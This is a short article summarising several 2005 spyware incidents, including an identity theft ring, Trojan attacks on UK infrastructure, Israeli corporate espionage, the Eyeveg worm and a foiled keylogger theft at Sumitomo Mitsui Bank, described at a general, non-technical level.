Recent examples of real-world spyware attacks indicate that the spyware threat is increasing in sophistication and prevalence. Clearly, there is much more to spyware than pop-up ads and browser redirects.

International Identity Theft Ring (August 2005)

An international identity theft ring that uses spyware to steal confidential personal information was unearthed in August. Credit card details, Social Security numbers, usernames, passwords, and other private information for an estimated 27,000 customers of over 50 international financial institutions were found. The criminal group captured this sensitive personal data through web-based Trojan horses that contained keylogger and backdoor spy programs. A computer user who visited the spyware-hosting website, perhaps as a result of a browser redirect or phishing email, would be attacked with an automatic drive-by download that installed Trojan horse and backdoor spyware.

UK Critical National Infrastructure (June 2005)

In June, the UK's National Infrastructure Security Co-ordination Centre announced that the British critical national infrastructure had been bombarded for several months with sophisticated, industrial-strength Trojan horse attacks. The attacks targeted specific individuals privy to commercially or economically sensitive information at over 300 key government, financial, transport, telecommunications, military, health, and energy organizations. The Trojan horse and backdoor spyware arrived through email and through websites that phishing email recipients were deceived into visiting. Once installed, the spyware programs collected user names, passwords, and system information; scanned drives; and uploaded documents and data to remote computers.

Israeli Corporate Espionage (May 2005)

The Israeli corporate scene was scandalized in May with news of the biggest case of industrial espionage in Israel's history. Police arrested the senior executives of 15 leading corporations and the private investigators they had allegedly employed for using Trojan horse spyware that stole tens of thousands of confidential documents from target companies. The Trojan horse and backdoor spyware attacked via email and CD-ROMs sent by regular mail and allowed a person to control a computer, make changes to its programs, monitor everything it contained, and send documents and pictures to FTP file-storage servers in Israel and overseas.

Eyeveg Spyware Worm (May 2005)

The Eyeveg worm demonstrates that even traditional viruses and worms may be repurposed with spyware capabilities. The spyware worm is embedded in an HTML attachment of an email and activates when the HTML renders. It drops a Trojan horse keylogger that loads into web browsers to capture data sent to SSL servers. The Trojan horse also includes a backdoor program that can upload/download files, copy/delete/find/start files, and retrieve system information. As with traditional worms, Eyeveg seeks to propagate itself, in this case by hijacking email addresses and emailing itself to more computers.

Sumitomo Mitsui Bank (March 2005)

In March, British police foiled a plot involving spyware to steal G220 million from Sumitomo Mitsui Bank in London. Cybercriminals targeted the bank's computer systems and secretly deployed a keylogger program, perhaps part of a Trojan horse, to capture passwords and access funds for electronic transfer. A man in Israel was arrested after allegedly trying to transfer G13.9 million into an Israeli account.